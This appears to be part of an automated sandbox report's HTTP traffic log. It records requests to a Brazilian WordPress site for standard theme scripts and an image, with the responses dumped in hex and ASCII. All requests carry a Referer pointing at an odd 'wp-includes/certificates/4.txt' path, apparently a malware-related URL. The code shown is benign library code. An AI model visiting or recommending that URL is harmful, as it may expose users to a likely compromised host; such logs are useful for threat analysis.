74 68 65 20 73 63 6f 70 65 0d 0a 20 20 20 20 20 2a 20 6f 66 20 74 68 69 73 20 66 75 6e 63 74 69 6f 6e 2e 0d 0a 20 20 20 20 20 2a 0d 0a 20 20 20 20 20 2a 20 54 68 69 73 20 65 6e 61 62 6c 65 73 20 79 6f 75 20 74 6f 20 64 65 66 69 6e 65 20 68 61 6e 64 6c 65 72 73 2c 20 66 6f 72 20 77 68 65 6e 20 74 68 65 20 44 4f 4d 20 69 73 20 72 65 61 64 79 3a 0d 0a 20 20 20 20 20 2a 0d 0a 20 20 20 20 20 2a 20 24 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 09 20 2a 0d 0a 09 20 2a 20 7d 29 3b 0d 0a 20 20 20 20 20 2a 0d 0a 20 20 20 20 20 2a 20 57 68 65 6e 20 74 68 65 20 77 69 6e 64 6f 77 20 69 73 20 6c 6f 61 64 65 64 3a 0d 0a 20 20 20 20 20 2a 0d 0a 20 20 20 20 20 2a 20 24 28 20 77 69 6e 64 6f 77 20 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 09 20 2a 0d 0a 09 20 2a 20 7d 29 3b 0d 0a 20 20 20 20 20 2a 0d 0a 20 20 20 20 20 2a 20 2e 2e 2e 61 6e 64 2f 6f 72 20 6f 74 68 65 72 20 70 6f 73 73 69 62 69 6c 69 74 69 65 73 2e 0d 0a 20 20 20 20 20 2a 0d 0a 20 20 20 20 20 2a 20 49 64 65 61 6c 6c 79 2c 20 69 74 20 69 73 20 6e 6f 74 20 63 6f 6e 73 69 64 65 72 65 64 20 62 65 73 74 20 70 72 61 63 74 69 73 65 20 74 6f 20 61 74 74 61 63 68 20 6d 6f 72 65 20 74 68 61 6e 20 61 0d 0a 20 20 20 20 20 2a 20 73 69 6e 67 6c 65 20 44 4f 4d 2d 72 65 61 64 79 20 6f 72 20 77 69 6e 64 6f 77 2d 6c 6f 61 64 20 68 61 6e 64 6c 65 72 20 66 6f 72 20 61 20 70 61 72 74 69 63 75 6c 61 72 20 70 61 67 65 2e 0d 0a 20 20 20 20 20 2a 20 41 6c 74 68 6f 75 67 68 20 73 63 72 69 70 74 73 20 69 6e 20 74 68 65 20 57 6f 72 64 50 72 65 73 73 20 63 6f 72 65 2c 20 50 6c 75 67 69 6e 73 20 61 6e 64 20 54 68 65 6d 65 73 20 6d 61 79 20 62 65 0d 0a 20 20 20 20 20 2a 20 70 72 61 63 74 69 73 69 6e 67 20 74 68 69 73 2c 20 77 65 20 73 68 6f 75 6c 64 20 73 74 72 69 76 65 20 74 6f 20 73 65 74 20 61 20 62 65 74 74 65 72 20 65 78 61 6d 70 6c 65 20 69 6e 20 6f 75 72 20 6f 77 6e 20 77 6f 72 6b 2e 0d 0a 20 20 20 20 20 2a 2f 0d 0a 0d 0a 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 0d 0a 20 20 20 20 20
                                        Data Ascii: (function() { 'use strict'; /** * All of the code for your public-facing JavaScript source * should reside in this file. * * Note: It has been assumed you will write jQuery code here, so the * $ function reference has been prepared for usage within the scope * of this function. * * This enables you to define handlers, for when the DOM is ready: * * $(function() { * * }); * * When the window is loaded: * * $( window ).load(function() { * * }); * * ...and/or other possibilities. * * Ideally, it is not considered best practise to attach more than a * single DOM-ready or window-load handler for a particular page. * Although scripts in the WordPress core, Plugins and Themes may be * practising this, we should strive to set a better example in our own work. */ jQuery(document).ready(function($) {
                                        Aug 16, 2022 10:48:52.382654905 CEST1178OUTGET /wp-content/themes/CherryFramework/js/jquery-migrate-1.2.1.min.js?ver=1.2.1 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:52.601720095 CEST1191INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:47:49 GMT
                                        Server: Apache
                                        ETag: "a534d0-1c1f-58592d497f080"
                                        Last-Modified: Tue, 02 Apr 2019 21:29:22 GMT
                                        Content-Length: 7199
                                        Content-Type: application/x-javascript
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 21534568 15074169
                                        Age: 63
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 76 31 2e 32 2e 31 20 7c 20 28 63 29 20 32 30 30 35 2c 20 32 30 31 33 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 2c 20 49 6e 63 2e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 3d 3d 76 6f 69 64 20 30 26 26 28 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 21 30 29 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 6e 29 7b 76 61 72 20 72 3d 74 2e 63 6f 6e 73 6f 6c 65 3b 69 5b 6e 5d 7c 7c 28 69 5b 6e 5d 3d 21 30 2c 65 2e 6d 69 67 72 61 74 65 57 61 72 6e 69 6e 67 73 2e 70 75 73 68 28 6e 29 2c 72 26 26 72 2e 77 61 72 6e 26 26 21 65 2e 6d 69 67 72 61 74 65 4d 75 74 65 26 26 28 72 2e 77 61 72 6e 28 22 4a 51 4d 49 47 52 41 54 45 3a 20 22 2b 6e 29 2c 65 2e 6d 69 67 72 61 74 65 54 72 61 63 65 26 26 72 2e 74 72 61 63 65 26 26 72 2e 74 72 61 63 65 28 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 74 2c 61 2c 69 2c 6f 29 7b 69 66 28 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 29 74 72 79 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 61 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 28 6f 29 2c 69 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 28 6f 29 2c 69 3d 65 7d 7d 29 2c 6e 7d 63 61 74 63 68 28 73 29 7b 7d 65 2e 5f 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 42 72 6f 6b 65 6e 3d 21 30 2c 74 5b 61 5d 3d 69 7d 76 61 72 20 69 3d 7b 7d 3b 65 2e 6d 69 67 72 61 74 65 57 61 72 6e 69 6e 67 73 3d 5b 5d 2c 21 65 2e 6d 69 67 72 61 74 65 4d 75 74 65 26 26 74 2e 63 6f 6e 73 6f 6c 65 26 26 74 2e 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 26 26 74 2e 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 4a 51 4d 49 47 52 41 54 45 3a 20 4c 6f 67 67 69 6e 67 20 69 73 20 61 63 74 69 76 65 22 29 2c 65 2e 6d 69 67 72 61 74 65 54 72 61 63 65 3d 3d 3d 6e 26 26 28 65 2e 6d 69 67 72 61 74 65 54 72 61 63 65 3d 21 30 29 2c 65 2e 6d 69 67 72 61 74 65 52 65 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 3d 7b 7d 2c 65 2e 6d 69 67 72 61 74 65 57 61 72 6e 69 6e 67 73 2e 6c 65 6e 67 74 68 3d 30 7d 2c 22 42 61 63 6b 43 6f 6d 70 61 74 22 3d 3d 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6d 70 61 74 4d 6f 64 65 26 26 72 28 22 6a 51 75 65 72 79 20 69 73 20 6e 6f 74 20 63 6f 6d 70 61 74 69 62 6c 65 20 77 69 74 68 20 51 75 69 72 6b 73 20 4d 6f 64 65 22 29 3b 76 61 72 20 6f 3d 65 28 22 3c 69 6e 70 75 74 2f 3e 22 2c 7b 73 69 7a 65 3a 31 7d 29 2e 61 74 74 72 28 22 73 69 7a 65 22 29 26 26 65 2e 61 74 74 72 46 6e 2c 73 3d 65 2e 61 74 74 72 2c 75 3d 65 2e 61 74 74 72 48 6f 6f 6b 73 2e 76 61 6c 75 65 26 26 65 2e 61 74 74 72 48 6f 6f 6b 73 2e 76 61 6c 75 65 2e 67 65 74 7c 7c 66 75 6e 63 74 69 6f 6e 28
                                        Data Ascii: /*! jQuery Migrate v1.2.1 | (c) 2005, 2013 jQuery Foundation, Inc. and other contributors | jquery.org/license */jQuery.migrateMute===void 0&&(jQuery.migrateMute=!0),function(e,t,n){function r(n){var r=t.console;i[n]||(i[n]=!0,e.migrateWarnings.push(n),r&&r.warn&&!e.migrateMute&&(r.warn("JQMIGRATE: "+n),e.migrateTrace&&r.trace&&r.trace()))}function a(t,a,i,o){if(Object.defineProperty)try{return Object.defineProperty(t,a,{configurable:!0,enumerable:!0,get:function(){return r(o),i},set:function(e){r(o),i=e}}),n}catch(s){}e._definePropertyBroken=!0,t[a]=i}var i={};e.migrateWarnings=[],!e.migrateMute&&t.console&&t.console.log&&t.console.log("JQMIGRATE: Logging is active"),e.migrateTrace===n&&(e.migrateTrace=!0),e.migrateReset=function(){i={},e.migrateWarnings.length=0},"BackCompat"===document.compatMode&&r("jQuery is not compatible with Quirks Mode");var o=e("<input/>",{size:1}).attr("size")&&e.attrFn,s=e.attr,u=e.attrHooks.value&&e.attrHooks.value.get||function(
                                        Aug 16, 2022 10:48:52.608490944 CEST1199OUTGET /wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:52.825865984 CEST1202INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:47:49 GMT
                                        Server: Apache
                                        ETag: "a53560-301a-58592d4b67500"
                                        Last-Modified: Tue, 02 Apr 2019 21:29:24 GMT
                                        Content-Length: 12314
                                        Content-Type: application/x-javascript
                                        X-Pad: avoid browser bug
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 21534570 15074173
                                        Age: 63
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 3b 77 69 6e 64 6f 77 2e 4d 6f 64 65 72 6e 69 7a 72 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 75 6e 63 74 69 6f 6e 20 42 28 61 29 7b 6a 2e 63 73 73 54 65 78 74 3d 61 7d 66 75 6e 63 74 69 6f 6e 20 43 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 42 28 6e 2e 6a 6f 69 6e 28 61 2b 22 3b 22 29 2b 28 62 7c 7c 22 22 29 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 61 3d 3d 3d 62 7d 66 75 6e 63 74 69 6f 6e 20 45 28 61 2c 62 29 7b 72 65 74 75 72 6e 21 21 7e 28 22 22 2b 61 29 2e 69 6e 64 65 78 4f 66 28 62 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 61 2c 62 29 7b 66 6f 72 28 76 61 72 20 64 20 69 6e 20 61 29 7b 76 61 72 20 65 3d 61 5b 64 5d 3b 69 66 28 21 45 28 65 2c 22 2d 22 29 26 26 6a 5b 65 5d 21 3d 3d 63 29 72 65 74 75 72 6e 20 62 3d 3d 22 70 66 78 22 3f 65 3a 21 30 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 47 28 61 2c 62 2c 64 29 7b 66 6f 72 28 76 61 72 20 65 20 69 6e 20 61 29 7b 76 61 72 20 66 3d 62 5b 61 5b 65 5d 5d 3b 69 66 28 66 21 3d 3d 63 29 72 65 74 75 72 6e 20 64 3d 3d 3d 21 31 3f 61 5b 65 5d 3a 44 28 66 2c 22 66 75 6e 63 74 69 6f 6e 22 29 3f 66 2e 62 69 6e 64 28 64 7c 7c 62 29 3a 66 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 48 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 3d 61 2e 63 68 61 72 41 74 28 30 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 2b 61 2e 73 6c 69 63 65 28 31 29 2c 65 3d 28 61 2b 22 20 22 2b 70 2e 6a 6f 69 6e 28 64 2b 22 20 22 29 2b 64 29 2e 73 70 6c 69 74 28 22 20 22 29 3b 72 65 74 75 72 6e 20 44 28 62 2c 22 73 74 72 69 6e 67 22 29 7c 7c 44 28 62 2c 22 75 6e 64 65 66 69 6e 65 64 22 29 3f 46 28 65 2c 62 29 3a 28 65 3d 28 61 2b 22 20 22 2b 71 2e 6a 6f 69 6e 28 64 2b 22 20 22 29 2b 64 29 2e 73 70 6c 69 74 28 22 20 22 29 2c 47 28 65 2c 62 2c 63 29 29 7d 66 75 6e 63 74 69 6f 6e 20 49 28 29 7b 65 2e 69 6e 70 75 74 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 66 6f 72 28 76 61 72 20 64 3d 30 2c 65 3d 63 2e 6c 65 6e 67 74 68 3b 64 3c 65 3b 64 2b 2b 29 74 5b 63 5b 64 5d 5d 3d 63 5b 64 5d 69 6e 20 6b 3b 72 65 74 75 72 6e 20 74 2e 6c 69 73 74 26 26 28 74 2e 6c 69 73 74 3d 21 21 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 61 74 61 6c 69 73 74 22 29 26 26 21 21 61 2e 48 54 4d 4c 44 61 74 61 4c 69 73 74 45 6c 65 6d 65 6e 74 29 2c 74 7d 28 22 61 75 74 6f 63 6f 6d 70 6c 65 74 65 20 61 75 74 6f 66 6f 63 75 73 20 6c 69 73 74 20 70 6c 61 63 65 68 6f 6c 64 65 72 20 6d 61 78 20 6d 69 6e 20 6d 75 6c 74 69 70 6c 65 20 70 61 74 74 65 72 6e 20 72 65 71 75 69 72 65 64 20 73 74 65 70 22 2e 73 70 6c 69 74 28 22 20 22 29 29 2c 65 2e 69 6e 70 75 74 74 79 70 65 73 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 64 3d 30 2c 65 2c 66 2c 68 2c 69 3d 61 2e 6c 65 6e 67 74 68 3b 64 3c 69 3b 64 2b 2b 29 6b 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 66 3d 61 5b 64 5d 29 2c 65 3d 6b 2e 74 79 70 65
                                        Data Ascii: ;window.Modernizr=function(a,b,c){function B(a){j.cssText=a}function C(a,b){return B(n.join(a+";")+(b||""))}function D(a,b){return typeof a===b}function E(a,b){return!!~(""+a).indexOf(b)}function F(a,b){for(var d in a){var e=a[d];if(!E(e,"-")&&j[e]!==c)return b=="pfx"?e:!0}return!1}function G(a,b,d){for(var e in a){var f=b[a[e]];if(f!==c)return d===!1?a[e]:D(f,"function")?f.bind(d||b):f}return!1}function H(a,b,c){var d=a.charAt(0).toUpperCase()+a.slice(1),e=(a+" "+p.join(d+" ")+d).split(" ");return D(b,"string")||D(b,"undefined")?F(e,b):(e=(a+" "+q.join(d+" ")+d).split(" "),G(e,b,c))}function I(){e.input=function(c){for(var d=0,e=c.length;d<e;d++)t[c[d]]=c[d]in k;return t.list&&(t.list=!!b.createElement("datalist")&&!!a.HTMLDataListElement),t}("autocomplete autofocus list placeholder max min multiple pattern required step".split(" ")),e.inputtypes=function(a){for(var d=0,e,f,h,i=a.length;d<i;d++)k.setAttribute("type",f=a[d]),e=k.type
                                        Aug 16, 2022 10:48:52.829260111 CEST1215OUTGET /wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0 HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:53.042288065 CEST1224INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:47:50 GMT
                                        Server: Apache
                                        ETag: "a52fb8-7054-58592f4b86d40"
                                        Last-Modified: Tue, 02 Apr 2019 21:38:21 GMT
                                        Content-Length: 28756
                                        Content-Type: application/x-javascript
                                        X-Pad: avoid browser bug
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 21534572 18932355
                                        Age: 63
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 2f 2a 2a 0a 2a 20 42 6f 6f 74 73 74 72 61 70 2e 6a 73 20 62 79 20 40 66 61 74 20 26 20 40 6d 64 6f 0a 2a 20 70 6c 75 67 69 6e 73 3a 20 62 6f 6f 74 73 74 72 61 70 2d 74 72 61 6e 73 69 74 69 6f 6e 2e 6a 73 2c 20 62 6f 6f 74 73 74 72 61 70 2d 6d 6f 64 61 6c 2e 6a 73 2c 20 62 6f 6f 74 73 74 72 61 70 2d 64 72 6f 70 64 6f 77 6e 2e 6a 73 2c 20 62 6f 6f 74 73 74 72 61 70 2d 73 63 72 6f 6c 6c 73 70 79 2e 6a 73 2c 20 62 6f 6f 74 73 74 72 61 70 2d 74 61 62 2e 6a 73 2c 20 62 6f 6f 74 73 74 72 61 70 2d 74 6f 6f 6c 74 69 70 2e 6a 73 2c 20 62 6f 6f 74 73 74 72 61 70 2d 70 6f 70 6f 76 65 72 2e 6a 73 2c 20 62 6f 6f 74 73 74 72 61 70 2d 61 66 66 69 78 2e 6a 73 2c 20 62 6f 6f 74 73 74 72 61 70 2d 61 6c 65 72 74 2e 6a 73 2c 20 62 6f 6f 74 73 74 72 61 70 2d 62 75 74 74 6f 6e 2e 6a 73 2c 20 62 6f 6f 74 73 74 72 61 70 2d 63 6f 6c 6c 61 70 73 65 2e 6a 73 2c 20 62 6f 6f 74 73 74 72 61 70 2d 63 61 72 6f 75 73 65 6c 2e 6a 73 2c 20 62 6f 6f 74 73 74 72 61 70 2d 74 79 70 65 61 68 65 61 64 2e 6a 73 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 32 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 2a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 61 70 61 63 68 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4c 49 43 45 4e 53 45 2d 32 2e 30 2e 74 78 74 0a 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 73 75 70 70 6f 72 74 2e 74 72 61 6e 73 69 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 62 6f 6f 74 73 74 72 61 70 22 29 2c 62 3d 7b 57 65 62 6b 69 74 54 72 61 6e 73 69 74 69 6f 6e 3a 22 77 65 62 6b 69 74 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 4d 6f 7a 54 72 61 6e 73 69 74 69 6f 6e 3a 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 2c 4f 54 72 61 6e 73 69 74 69 6f 6e 3a 22 6f 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 20 6f 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 2c 74 72 61 6e 73 69 74 69 6f 6e 3a 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 7d 2c 63 3b 66 6f 72 28 63 20 69 6e 20 62 29 69 66 28 61 2e 73 74 79 6c 65 5b 63 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 29 72 65 74 75 72 6e 20 62 5b 63 5d 7d 28 29 3b 72 65 74 75 72 6e 20 61 26 26 7b 65 6e 64 3a 61 7d 7d 28 29 7d 29 7d 28 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 29 2c 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 63 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 3d 61 28 62 29 2e 64 65 6c 65 67 61 74 65 28 27 5b 64 61 74 61 2d 64 69 73 6d 69 73 73 3d 22 6d 6f 64 61 6c 22 5d 27 2c 22 63 6c 69 63 6b 2e 64 69 73 6d 69 73 73 2e 6d 6f 64 61 6c 22 2c 61 2e 70 72 6f 78 79 28 74 68 69 73 2e 68 69 64 65 2c 74 68 69 73 29 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 6d 6f 74 65 26 26 74 68 69 73 2e 24 65 6c 65 6d 65 6e
                                        Data Ascii: /*** Bootstrap.js by @fat & @mdo* plugins: bootstrap-transition.js, bootstrap-modal.js, bootstrap-dropdown.js, bootstrap-scrollspy.js, bootstrap-tab.js, bootstrap-tooltip.js, bootstrap-popover.js, bootstrap-affix.js, bootstrap-alert.js, bootstrap-button.js, bootstrap-collapse.js, bootstrap-carousel.js, bootstrap-typeahead.js* Copyright 2012 Twitter, Inc.* http://www.apache.org/licenses/LICENSE-2.0.txt*/!function(a){a(function(){a.support.transition=function(){var a=function(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"},c;for(c in b)if(a.style[c]!==undefined)return b[c]}();return a&&{end:a}}()})}(window.jQuery),!function(a){var b=function(b,c){this.options=c,this.$element=a(b).delegate('[data-dismiss="modal"]',"click.dismiss.modal",a.proxy(this.hide,this)),this.options.remote&&this.$elemen
                                        Aug 16, 2022 10:48:53.046933889 CEST1254OUTGET /wp-content/uploads/2018/08/facex_horizontal2-e1535501425981.png HTTP/1.1
                                        Accept: */*
                                        Referer: http://facextrade.com.br/wp-includes/certificates/4.txt
                                        Accept-Language: en-US
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: facextrade.com.br
                                        Connection: Keep-Alive
                                        Aug 16, 2022 10:48:53.265511036 CEST1256INHTTP/1.1 200 OK
                                        Date: Tue, 16 Aug 2022 08:48:14 GMT
                                        Server: Apache
                                        ETag: "a54b42-573c-58592e472c700"
                                        Last-Modified: Tue, 02 Apr 2019 21:33:48 GMT
                                        Content-Length: 22332
                                        Content-Type: image/png
                                        Cache-Control: No-Cache
                                        Pragma: no-cache
                                        X-Varnish: 22428536 21534518
                                        Age: 38
                                        Via: 1.1 varnish-v4
                                        Accept-Ranges: bytes
                                        Connection: keep-alive
                                        Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 87 00 00 00 cb 08 06 00 00 00 1c 11 39 dc 00 00 20 00 49 44 41 54 78 9c ec 9d 79 7c 54 d5 fd f7 3f df 3b 4b 26 0b 21 84 24 84 10 03 01 8a 80 11 01 23 4b 40 01 7f 6e 45 02 82 82 16 65 d3 56 6c ad b5 b5 2e b5 fe fa f0 e2 f1 69 ad b5 d6 da cd 52 6b 21 c1 15 5c d8 a5 2e c5 85 04 84 88 a8 28 8a 2c 21 04 08 49 08 21 64 99 f5 7e 9f 3f 66 a8 49 66 c9 3d 77 ee 64 26 c9 79 bf ea 8b 57 ef 3d e7 dc 33 4b e6 7e ee 77 05 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 89 44 22 91 48 24 12 83 a1 68 6f 20 56 d9 c6 6c b6 95 57 65 5b 40 99 4c 4a 2a 88 d3 18 94 aa 80 6d 0c c4 03 00 33 cc 44 70 83 c9 c5 84 46 62 34 aa ac d6 9a 14 aa 85 aa d4 9e 43 63 f9 b4 dc 5c 7b b4 5f 8b 44 22 91 48 24 12 89 56 7a bc 38 dc 7b f2 64 82 d3 a1 8c 06 29 79 00 5f 0c 70 1e 40 83 89 39 1b 44 8a 01 97 a8 66 e0 30 31 be 02 e1 53 86 ba cf 6c 51 f7 8e cd ca aa 35 60 6d 89 44 22 91 48 24 12 43 e9 71 e2 f0 a3 ca ca 54 93 c7 7a a5 0a 4c 01 b8 80 18 a3 0d 12 81 62 30 1f 64 50 29 03 1f 32 3c ef 4c 18 d4 bf bc d3 f7 20 91 48 24 12 89 44 d2 8e 1e 21 0e 77 57 54 e5 81 69 2e 83 ae 01 f3 38 8a 86 18 ec 08 e6 03 4c d8 ca cc eb 8f 0e ec f7 de 3c 22 35 da 5b 92 48 24 12 89 44 d2 f3 e8 b6 e2 b0 ec 48 cd 70 55 51 6f 25 60 1e 40 c3 a2 bd 1f 11 98 51 0b f0 eb 50 e8 85 71 39 19 1f 44 7b 3f 12 89 44 22 91 48 7a 0e dd 4a 1c ee 3d 79 32 c1 e1 54 e6 11 e8 07 04 14 44 7b 3f 46 c0 8c c3 20 7e 96 55 ac 1a 9f db af 2a da fb 91 48 24 12 89 44 d2 bd e9 16 e2 b0 b4 a2 36 cb ac aa f7 00 7c 17 11 a5 84 b3 96 ca 8c ea ba 66 9c a8 6d c2 e9 86 16 d4 9d b3 a3 a1 d9 85 06 bb 13 2d 2e 0f 1a 5d 1e 34 b9 3c 50 99 01 00 16 45 81 cd ac 20 c9 62 82 cd 62 42 6f 9b 15 c9 09 16 a4 24 c5 21 bd 77 02 b2 d2 12 91 de 27 01 26 25 bc b7 9a c1 6e 02 bd ac aa fc e4 f8 dc 7e 7b c3 5a 4c 22 91 48 24 12 89 24 08 5d 5a 1c 7e 5c 71 6a a8 aa d2 23 4c 7c 1b 81 cc a2 f3 99 19 47 4e 36 e0 d0 f1 7a 1c ad 39 87 6f 6a 1a f1 59 63 0b 1a 54 36 74 9f 49 44 18 9b 1c 8f dc be 49 18 98 de 0b df c9 4e 41 6e ff 64 10 e9 7b fb 19 fc 1f 52 95 47 2f cb 4d 7f cf d0 8d 4a 24 12 89 44 22 e9 f1 74 49 71 b8 eb 68 d5 60 b0 b2 8c c0 b7 89 66 1a d7 d6 b7 60 cf 81 6a 7c 59 79 06 bb ab cf a2 dc e5 89 d4 36 43 32 c8 62 c2 a5 e9 c9 b8 64 60 5f 8c fe 4e 3a fa f6 8e 17 5f 84 f9 03 62 7e 28 3f 37 73 a7 f1 3b 94 48 24 12 89 44 d2 13 e9 52 e2 70 e7 81 da 64 25 4e 7d 04 e0 9f 12 c8 aa 75 de a9 ba 66 94 7e 71 12 65 e5 b5 78 af be 29 92 5b d4 cd 94 94 04 4c c8 4d c7 c4 bc 2c a4 a7 08 0b c5 d7 19 ea 03 e3 06 66 1e 8e c4 de 24 12 89 44 22 91 f4 1c ba 8c 38 dc 5d 5e fd 7d 06 1e 23 42 9a 96 f1 0e a7 1b a5 fb 4e 62 fb d7 55 d8 5a 7b 2e d2 db 33 0c 2b 80 2b d3 7a 61 ea c8 2c 4c b8 28 13 16 b3 49 d3 3c 06 3b 01 fa a3 62 76 2d cf 1f 30 a0 39 b2 bb 94 48 24 12 89 44 d2 5d 89 79 71 b8 eb 70 cd 30 52 d4 67 41 74 85 96 f1 d5 67 9a f1 ee 9e
